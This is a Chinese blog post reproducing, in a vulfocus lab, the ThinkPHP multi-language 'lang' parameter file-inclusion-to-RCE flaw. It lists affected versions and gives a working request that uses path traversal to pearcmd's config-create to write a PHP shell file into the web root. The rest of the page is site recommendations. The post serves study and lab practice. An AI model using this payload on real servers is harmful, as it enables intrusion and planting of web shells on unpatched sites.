vulfocus复现:thinkphp lang 命令执行(thinkphp:6.0.12)

最新推荐文章于 2024-04-22 20:14:47 发布
最新推荐文章于 2024-04-22 20:14:47 发布
阅读量2.7k 收藏 4
点赞数 3
分类专栏: vulfocus 文章标签: php 开发语言 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71518346/article/details/128360317
版权

目录

描述(来自vulfocus):

漏洞介绍(来自vulfocus):

影响版本:

复现:

1,打开靶场,显示没有权限bp拦截

 2,将phpinfo写到网站根目录下/var/www/html

 3,访问shell.php

 4,拿到flag

描述(来自vulfocus):

ThinkPHP 是一个快速、简单的面向对象的轻量级 PHP 开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。

如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

漏洞介绍(来自vulfocus):

在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。

虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件

访问路径诶:/public/index.php

影响版本:

6.0.1 < ThinkPHP≤ 6.0.13

5.0.0 < ThinkPHP≤ 5.0.12

5.1.0 < ThinkPHP≤ 5.1.8

复现:

1,打开靶场,显示没有权限bp拦截

 2,将phpinfo写到网站根目录下/var/www/html

 public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+/var/www/html/shell.php

 

 3,访问shell.php

 4,拿到flag

 

 

有原则的兔子
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
框架:ThinkPHP框架
02-05
ThinkPHP 6.0 ThinkPHP6.0基本架构采用PHP7.1改写和进一步优化。 | 主要新特性 采用PHP7强类型(严格模式) 支持更多的PSR规范 原生多应用支持 系统服务注入支持 ORM作为独立组件使用 增加文件系统 全新的事件系统 模板引擎分离出核心 内部功能中间件化 会话机制改进 日志多通道支持 规范扩展接口 更强大的控制台 对Swoole以及协程支持改进 对IDE更加友好 统一和精简大量用法 ThinkPHP6.0的运行环境要求PHP7.1 +,兼容PHP8.0。 安装 composer create-project topthink/think tp 启动服务 cd
thinkphp 命令执行
xiaopzi的博客
01-16 1252
echo $PATH/root/perl5/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin这里/usr/local/bin优先于/usr/bin。上面的意思是,linux执行任何命令,都会先去/usr/local/sbin,如果没有再去/usr/local/bin下面,如果还没有就去/usr/local/bin,以此类推,如果都没有,就会提示找不到命令。/usr/bin存放一些用户命令,如led(控制LED灯的)。
ThinkPHP_getshell-v2.zip
11-11
验证think PHP5版本漏洞并可以getshell
ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5
02-24
ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5 欢迎关注PHP学习博客:http://blog.csdn.net/column/details/14209.html
python3编写ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编写ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
thinkphp lang命令执行(QVD-2022-46174)漏洞复现
weixin_54584489的博客
04-29 803
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。当ThinkPHP开启多语言功能,并且存在扩展pear时,攻击者可以构造lang参数实现远程代码执行。本次漏洞复现,是建立在前人的基础上的,整个过程没有遇到太大问题,总体收获就是感受了一把该漏洞,以及复习了前面学习到的一句话木马,同时扩展了一些小知识点。将思绪代入最初的漏洞发现者,才明白知识储备对挖洞者的重要性。
【漏洞复现-thinkphp-命令执行vulfocus/thinkphp-3.2.x
10-14 1871
thinkphp-命令执行】日志包含
Thinkphp漏洞详解合集
Aiwin的博客
05-24 2823
Thinkphp漏洞合集详细分析(未完成)
ThinkPHP V6.0.12LTS 反序列化漏洞的保姆级教程(含exp编写过程)
include_voidmain的博客
08-23 3532
ThinkPHP V6.0.12LTS 反序列化漏洞的保姆级教程(含exp编写过程)
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1105
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行
fastadmin-thinkphp5.1:ThinkPHP 5.1.38 LTS的fastadmin
05-29
FastAdmin 完全升级 thinkphp5.1 fastadmin: 1.0.0.20190418_beta thinkphp: 5.1.38 LTS 安装使用 环境要求 PHP >= PHP7.1 Mysql >= 5.5.0 (需支持innodb引擎) Apache 或 Nginx PDO PHP Extension MBstring PHP Extension CURL PHP Extension Node.js (可选,用于安装Bower和LESS,同时打包压缩也需要使用到) Composer (可选,用于管理第三方扩展包) Bower (可选,用于管理前端资源) Less (可选,用于编辑less文件,如果你需要增改css样式,最好安装上) 安装 克隆项目 git clone https://github.com/hellowzsg/fastadmin-thinkphp5.
php开发工程师系统性教学】——Laravel框架(验证码)的配置和使用的保姆式教程
php优质创造者
04-21 1608
👨‍💻。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 469
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 744
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
Laravel 6 - 第十五章 验证器
逆旅岁月的博客
04-22 1468
用于验证输入数据是否符合特定规则的一个组件,Laravel 6 提供了一个简洁且强大的验证系统,可以轻松验证来自用户输入或其他来源的数据。
牛客NC233 加起来和为目标值的组合(四)【中等 DFS C++、Java、Go、PHP
最新发布
weixin_37991016的博客
04-22 205
代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可。* @param nums int整型一维数组。* @param target int整型。* @return int整型。
PHP定时任务框架taskPHP3.0学习记录5环境部署常见问题及解决方案
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
04-19 840
如果你在使用 PHP 代码时遇到了 “function popen is disabled” 的错误,这意味着 PHP 配置中禁用了 popen 函数的使用。在命令行中运行一个简单的 PHP 脚本,使用 extension_loaded(‘redis’) 来检查 Redis 扩展是否已加载。找到 disable_functions 指令,从该指令中移除 popen,保存文件并重启 web 服务器。当出现一下错误,说明php版本不支持,建议升级php版本,至少>5.6。
计算机毕设项目-益苗易约小程序:thinkphp5+微信小程序
09-19
益苗易约小程序是一个基于ThinkPHP5框架和微信小程序开发的计算机毕设项目。该项目的目的是为了提供一个方便农民购买农资和农产品的平台,同时也为农民提供了一个交流和约牧的社交平台。 益苗易约小程序使用了ThinkPHP5框架进行后端开发,该框架是一种快速、可靠、扩展性强的PHP开发框架。通过使用ThinkPHP5,我们能够快速搭建起后端服务器,处理用户的请求和响应,同时也能方便地与数据库进行交互,保证系统的稳定性和可靠性。 而微信小程序则是我们选择的前端开发平台,它可以在微信内直接调用,并提供了一系列丰富的API接口。通过微信小程序,用户可以方便地浏览和购买农资和农产品,同时也能够与其他农民进行交流和约牧。 益苗易约小程序的主要功能包括: 1. 农民可以在小程序中查看并购买各类农资和农产品,并进行在线支付。 2. 农民可以通过小程序发布约牧信息,与其他农民进行交流和约牧。 3. 小程序提供了一个农民社区,农民可以在社区中分享经验和交流心得。 4. 小程序还提供了一些辅助功能,比如天气查询、农产品价格查询等。 通过开发益苗易约小程序,我们能够提供一个方便快捷的购买农资和农产品的平台,同时也能为农民提供一个交流和约牧的社交平台,方便农民们进行信息交流和资源分享。这个项目结合了ThinkPHP5框架和微信小程序的优势,能够高效地实现这些功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值